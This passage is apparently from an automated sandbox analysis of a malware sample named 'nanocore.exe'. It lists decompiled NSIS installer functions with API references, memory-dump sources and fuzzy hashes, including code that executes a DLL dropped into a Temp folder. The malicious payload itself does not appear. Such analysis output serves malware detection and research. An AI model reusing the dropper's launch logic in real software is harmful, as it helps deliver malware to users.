            				_t37 = _t49[1];
            				_v16.lbColor = _t37;
            				if((_t49[5] & 0x00000008) != 0) {
            					_t37 = GetSysColor(_t37);
            					_v16.lbColor = _t37;
            				}
            				if((_t49[5] & 0x00000004) != 0) {
            					SetBkColor(_a8, _t37);
            				}
            				if((_t49[5] & 0x00000010) != 0) {
            					_v16.lbStyle = _t49[2];
            					_t40 = _t49[3];
            					if(_t40 != 0) {
            						DeleteObject(_t40);
            					}
            					_t49[3] = CreateBrushIndirect( &_v16);
            				}
            				return _t49[3];
            			}

            0x00403e20
            0x00403eb4
            0x00000000
            0x00403eb4
            0x00403e31
            0x00403e35
            0x00000000
            0x00000000
            0x00403e3b
            0x00403e44
            0x00403e47
            0x00403e47
            0x00403e4d
            0x00403e53
            0x00403e53
            0x00403e5f
            0x00403e65
            0x00403e6c
            0x00403e6f
            0x00403e72
            0x00403e74
            0x00403e74
            0x00403e7c
            0x00403e82
            0x00403e82
            0x00403e8c
            0x00403e91
            0x00403e94
            0x00403e99
            0x00403e9c
            0x00403e9c
            0x00403eac
            0x00403eac
            0x00000000

            APIs
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
            • String ID:
            • API String ID: 2320649405-0
            • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
            • Instruction ID: 944c776da9ffcbc306ecb8e42b0009ed864c9b653f4a8b06b4458955b6ce273b
            • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
            • Instruction Fuzzy Hash: 25214F71904744ABCB219F68DD08B5BBFF8AF00715B048A69F895E22E1D738EA04CB95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E0040166B() {
            				int _t18;
            				void* _t28;
            				void* _t35;
            
            				 *(_t35 + 8) = E00402A9A(0xffffffd0);
            				 *(_t35 - 8) = E00402A9A(0xffffffdf);
            				E004059BF(0x40a018,  *(_t35 + 8));
            				_t18 = lstrlenA( *(_t35 - 8));
            				if(_t18 + lstrlenA( *(_t35 + 8)) < 0x3fd) {
            					lstrcatA(0x40a018, 0x40901c);
            					lstrcatA(0x40a018,  *(_t35 - 8));
            				}
            				if(MoveFileA( *(_t35 + 8),  *(_t35 - 8)) == 0) {
            					if( *((intOrPtr*)(_t35 - 0x1c)) == _t28 || E00405C94( *(_t35 + 8)) == 0) {
            						 *((intOrPtr*)(_t35 - 4)) = 1;
            					} else {
            						E00405707( *(_t35 + 8),  *(_t35 - 8));
            						_push(0xffffffe4);
            						goto L7;
            					}
            				} else {
            					_push(0xffffffe3);
            					L7:
            					E00401428();
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t35 - 4));
            				return 0;
            			}

            0x00401674
            0x00401684
            0x00401688
            0x00401690
            0x004016a7
            0x004016af
            0x004016b8
            0x004016b8
            0x004016cb
            0x004016d7
            0x004026da
            0x004016ed
            0x004016f3
            0x004016f8
            0x00000000
            0x004016f8
            0x004016cd
            0x004016cd
            0x004021e8
            0x004021e8
            0x004021e8
            0x00402932
            0x0040293e

            APIs
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 00401690
            • lstrlenA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 0040169A
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 004016AF
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,0040901C,?,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,?,000000DF,000000D0), ref: 004016B8
              • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\nanocore.exe" ), ref: 00405CA2
              • Part of subcall function 00405C94: FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
              • Part of subcall function 00405C94: SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
              • Part of subcall function 00405C94: FindClose.KERNELBASE(00000000), ref: 00405CC0
              • Part of subcall function 00405707: CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
              • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
              • Part of subcall function 00405707: GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
              • Part of subcall function 00405707: wsprintfA.USER32 ref: 004057A0
              • Part of subcall function 00405707: GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
              • Part of subcall function 00405707: lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
              • Part of subcall function 00405707: CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
              • Part of subcall function 00405707: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
              • Part of subcall function 00405707: GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
              • Part of subcall function 00405707: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
            • MoveFileA.KERNEL32(?,?), ref: 004016C3
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: File$lstrcat$CloseErrorFindModeNamePathShortlstrlen$AllocCreateDirectoryFirstGlobalHandleMoveReadSizeWindowslstrcpynwsprintf
            • String ID: C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll
            • API String ID: 2621199633-4214189533
            • Opcode ID: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
            • Instruction ID: fea5f1e5da9c35cb7cab6b6f1408056446a07f0d4044b317f115ce8379a8f22b
            • Opcode Fuzzy Hash: e34dedb074c22f8b75bca2a446b82d177209b2bfd9f99b0c9f35470352dc7494
            • Instruction Fuzzy Hash: 7D11A031904214FBCF016FA2CD0899E3A62EF41368F20413BF401751E1DA3D8A81AF5D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00404627(struct HWND__* _a4, intOrPtr _a8) {
            				long _v8;
            				signed char _v12;
            				unsigned int _v16;
            				void* _v20;
            				intOrPtr _v24;
            				long _v56;
            				void* _v60;
            				long _t15;
            				unsigned int _t19;
            				signed int _t25;
            				struct HWND__* _t28;
            
            				_t28 = _a4;
            				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
            				if(_a8 == 0) {
            					L4:
            					_v56 = _t15;
            					_v60 = 4;
            					SendMessageA(_t28, 0x110c, 0,  &_v60);
            					return _v24;
            				}
            				_t19 = GetMessagePos();
            				_v16 = _t19 >> 0x10;
            				_v20 = _t19;
            				ScreenToClient(_t28,  &_v20);
            				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
            				if((_v12 & 0x00000066) != 0) {
            					_t15 = _v8;
            					goto L4;
            				}
            				return _t25 | 0xffffffff;
            			}

            0x00404635
            0x00404642
            0x00404648
            0x00404686
            0x00404686
            0x00404695
            0x0040469c
            0x00000000
            0x0040469e
            0x0040464a
            0x00404659
            0x00404661
            0x00404664
            0x00404676
            0x0040467c
            0x00404683
            0x00000000
            0x00404683
            0x00000000

            APIs
            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404642
            • GetMessagePos.USER32 ref: 0040464A
            • ScreenToClient.USER32 ref: 00404664
            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404676
            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040469C
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Message$Send$ClientScreen
            • String ID: f
            • API String ID: 41195575-1993550816
            • Opcode ID: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
            • Instruction ID: cc273b5f7af9833ca02a78eb85435134e40410870e31f3474614dd8078ab484b
            • Opcode Fuzzy Hash: a62ee4c6f8744dddd87d0a1d61b58e140f64d2c7e8211fa38f6ec5a760cc9808
            • Instruction Fuzzy Hash: 0A015271D00218BADB00DB94DC85BFFBBBCAB55711F10412BBB00B62C0D7B869418BA5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00402BAB(struct HWND__* _a4, intOrPtr _a8, CHAR* _a16) {
            				int _t7;
            				int _t15;
            				struct HWND__* _t16;
            
            				_t16 = _a4;
            				if(_a8 == 0x110) {
            					SetTimer(_t16, 1, 0xfa, 0);
            					_a8 = 0x113;
            					 *0x40b020 = _a16;
            				}
            				if(_a8 == 0x113) {
            					_t15 =  *0x789930; // 0x4e6c2
            					_t7 =  *0x79d938; // 0x4e6c6
            					if(_t15 >= _t7) {
            						_t15 = _t7;
            					}
            					wsprintfA(0x7898f0,  *0x40b020, MulDiv(_t15, 0x64, _t7));
            					SetWindowTextA(_t16, 0x7898f0);
            					SetDlgItemTextA(_t16, 0x406, 0x7898f0);
            					ShowWindow(_t16, 5);
            				}
            				return 0;
            			}

            0x00402bb7
            0x00402bbf
            0x00402bcb
            0x00402bd4
            0x00402bd7
            0x00402bd7
            0x00402bdf
            0x00402be1
            0x00402be7
            0x00402bee
            0x00402bf0
            0x00402bf0
            0x00402c09
            0x00402c14
            0x00402c21
            0x00402c29
            0x00402c29
            0x00402c34

            APIs
            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BCB
            • MulDiv.KERNEL32(0004E6C2,00000064,0004E6C6), ref: 00402BF6
            • wsprintfA.USER32 ref: 00402C09
            • SetWindowTextA.USER32(?,007898F0), ref: 00402C14
            • SetDlgItemTextA.USER32 ref: 00402C21
            • ShowWindow.USER32(?,00000005,?,00000406,007898F0), ref: 00402C29
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: TextWindow$ItemShowTimerwsprintf
            • String ID:
            • API String ID: 559026099-0
            • Opcode ID: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
            • Instruction ID: fbe1f7977b8df494303572dcbb2cbc4cea34e2fcb0be9a91995bb721301161c2
            • Opcode Fuzzy Hash: 6bb25f70a1653d38713b2b3ce1117d23bb5b874e0913eb29b27a21d06f6436fe
            • Instruction Fuzzy Hash: F0017531940214ABD7116F15AD49FBB3B68EB45721F00403AFA05B62D0D7B86851DBA9
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E00401E34() {
            				signed int _t7;
            				void* _t19;
            				char* _t20;
            				signed int _t24;
            				void* _t26;
            
            				_t24 = E00402A9A(_t19);
            				_t20 = E00402A9A(0x31);
            				_t7 = E00402A9A(0x22);
            				_push(_t20);
            				_push(_t24);
            				_t22 = _t7;
            				wsprintfA("C:\Users\jones\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll", "%s %s");
            				E00401428(0xffffffec);
            				asm("sbb eax, eax");
            				asm("sbb eax, eax");
            				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
            					 *((intOrPtr*)(_t26 - 4)) = 1;
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t26 - 4));
            				return 0;
            			}

            0x00401e3c
            0x00401e45
            0x00401e47
            0x00401e4c
            0x00401e4d
            0x00401e58
            0x00401e5a
            0x00401e65
            0x00401e71
            0x00401e7f
            0x00401e91
            0x004026da
            0x004026da
            0x00402932
            0x0040293e

            APIs
            • wsprintfA.USER32 ref: 00401E5A
            • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E88
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00401E73
            • C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll, xrefs: 00401E53
            • %s %s, xrefs: 00401E4E
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: ExecuteShellwsprintf
            • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll
            • API String ID: 2956387742-2276065101
            • Opcode ID: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
            • Instruction ID: ce03d906cf3866787b37d6904cdbd79c6318199a3569b7a51aa2d89d7359fd60
            • Opcode Fuzzy Hash: 05d836665ae50fce2707af320b19060b42cd68dfbfcf627df7f78d71aa10da7e
            • Instruction Fuzzy Hash: ADF0F471B042006EC711AFB59D4EE6E3AA8DB42319B200837F001F61D3D5BD88519768
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00402ADA(void* _a4, char* _a8, intOrPtr _a12) {
            				void* _v8;
            				char _v272;
            				long _t14;
            
            				_t14 = RegOpenKeyExA(_a4, _a8, 0, 8,  &_v8);
            				if(_t14 == 0) {
            					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
            						if(_a12 != 0) {
            							RegCloseKey(_v8);
            							return 1;
            						}
            						if(E00402ADA(_v8,  &_v272, 0) != 0) {
            							break;
            						}
            					}
            					RegCloseKey(_v8);
            					return RegDeleteKeyA(_a4, _a8);
            				}
            				return _t14;
            			}

            0x00402af5
            0x00402afd
            0x00402b25
            0x00402b0f
            0x00402b56
            0x00000000
            0x00402b5e
            0x00402b23
            0x00000000
            0x00000000
            0x00402b23
            0x00402b3a
            0x00000000
            0x00402b46
            0x00402b50

            APIs
            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000008,?), ref: 00402AF5
            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B31
            • RegCloseKey.ADVAPI32(?), ref: 00402B3A
            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B46
            • RegCloseKey.ADVAPI32(?), ref: 00402B56
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Close$DeleteEnumOpen
            • String ID:
            • API String ID: 1912718029-0
            • Opcode ID: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
            • Instruction ID: 075d0217e77777f9092c7514f2922301dec465e9e1858cbb0099f988ba13f04e
            • Opcode Fuzzy Hash: 0ec0c72ac22d197f92e3eb34b47e7c738ded362e1e52db29065c5b2891b64f43
            • Instruction Fuzzy Hash: 02012572900108FFDB21AF90DE88DAF7B7DEB44384F108572BA01A10A0D7B4AE55AB65
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401D32() {
            				void* _t18;
            				struct HINSTANCE__* _t22;
            				struct HWND__* _t25;
            				void* _t27;
            
            				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x20));
            				GetClientRect(_t25, _t27 - 0x40);
            				_t18 = SendMessageA(_t25, 0x172, _t22, LoadImageA(_t22, E00402A9A(_t22), _t22,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
            				if(_t18 != _t22) {
            					DeleteObject(_t18);
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t27 - 4));
            				return 0;
            			}

            0x00401d3e
            0x00401d45
            0x00401d74
            0x00401d7c
            0x00401d83
            0x00401d83
            0x00402932
            0x0040293e

            APIs
            • GetDlgItem.USER32 ref: 00401D38
            • GetClientRect.USER32 ref: 00401D45
            • LoadImageA.USER32 ref: 00401D66
            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D74
            • DeleteObject.GDI32(00000000), ref: 00401D83
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
            • String ID:
            • API String ID: 1849352358-0
            • Opcode ID: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
            • Instruction ID: 24e3e63a5c7369e1328c4ed5f53ad3de25e73d2730998e74081e515a34f76845
            • Opcode Fuzzy Hash: dac48a23ca69c3059e9ed47d02cf7cf39d3eefcb1fcb610c0a571ddde2ae894b
            • Instruction Fuzzy Hash: 7DF0FFB2A04115BFDB01DBE4EE88DAF77BDEB08311B105466F601F6191C7789D418B29
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 35%
            			E00404545(int _a4, intOrPtr _a8, unsigned int _a12) {
            				char _v36;
            				char _v68;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t26;
            				void* _t34;
            				signed int _t36;
            				signed int _t39;
            				unsigned int _t46;
            
            				_t46 = _a12;
            				_push(0x14);
            				_pop(0);
            				_t34 = 0xffffffdc;
            				if(_t46 < 0x100000) {
            					_push(0xa);
            					_pop(0);
            					_t34 = 0xffffffdd;
            				}
            				if(_t46 < 0x400) {
            					_t34 = 0xffffffde;
            				}
            				if(_t46 < 0xffff3333) {
            					_t39 = 0x14;
            					asm("cdq");
            					_t46 = _t46 + 1 / _t39;
            				}
            				_push(E004059E1(_t34, 0, _t46,  &_v36, 0xffffffdf));
            				_push(E004059E1(_t34, 0, _t46,  &_v68, _t34));
            				_t21 = _t46 & 0x00ffffff;
            				_t36 = 0xa;
            				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
            				_push(_t46 >> 0);
            				_t26 = E004059E1(_t34, 0, 0x79f580, 0x79f580, _a8);
            				wsprintfA(_t26 + lstrlenA(0x79f580), "%u.%u%s%s");
            				return SetDlgItemTextA( *0x7a2758, _a4, 0x79f580);
            			}

            APIs
            • lstrlenA.KERNEL32(0079F580,0079F580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404465,000000DF,?,00000000,00000400), ref: 004045D3
            • wsprintfA.USER32 ref: 004045DB
            • SetDlgItemTextA.USER32 ref: 004045EE
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: ItemTextlstrlenwsprintf
            • String ID: %u.%u%s%s
            • API String ID: 3540041739-3551169577
            • Opcode ID: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
            • Instruction ID: e1fe79347d8d052d3bbdd742c897f6fd786447eee0d7872ec31327a957c1f8d6
            • Opcode Fuzzy Hash: 1889a7adf10d335a807e3f6632fec442bbf7daaf42d867185502e520216b2d79
            • Instruction Fuzzy Hash: 35110473A0012477DB00666D9C46EAF3689CBC6374F14023BFA25F61D1E9788C1186A8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 54%
            			E00401C19(void* __ecx) {
            				signed int _t30;
            				CHAR* _t33;
            				long _t34;
            				int _t39;
            				signed int _t40;
            				int _t44;
            				void* _t46;
            				int _t51;
            				struct HWND__* _t55;
            				void* _t58;
            
            				_t46 = __ecx;
            				 *(_t58 - 8) = E00402A9A(0x33);
            				 *(_t58 + 8) = E00402A9A(0x44);
            				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
            					 *((intOrPtr*)(__ebp - 8)) = E00405936(__ecx,  *((intOrPtr*)(__ebp - 8)));
            				}
            				__eflags =  *(_t58 - 0x10) & 0x00000002;
            				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
            					 *(_t58 + 8) = E00405936(_t46,  *(_t58 + 8));
            				}
            				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
            				_push(1);
            				if(__eflags != 0) {
            					_t53 = E00402A9A();
            					_t30 = E00402A9A();
            					asm("sbb ecx, ecx");
            					asm("sbb eax, eax");
            					_t33 =  ~( *_t29) & _t53;
            					__eflags = _t33;
            					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
            					goto L10;
            				} else {
            					_t55 = E00402A7D();
            					_t39 = E00402A7D();
            					_t51 =  *(_t58 - 0x10) >> 2;
            					if(__eflags == 0) {
            						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
            						L10:
            						 *(_t58 - 0x34) = _t34;
            					} else {
            						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x34);
            						asm("sbb eax, eax");
            						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
            					}
            				}
            				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
            				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
            					_push( *(_t58 - 0x34));
            					E0040591D();
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t58 - 4));
            				return 0;
            			}

            APIs
            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7B
            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C93
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$Timeout
            • String ID: !
            • API String ID: 1777923405-2657877971
            • Opcode ID: 2afc5cef8f1a93f9b63a8f53a852115a8ca671caf7fe296a62c6272823973d68
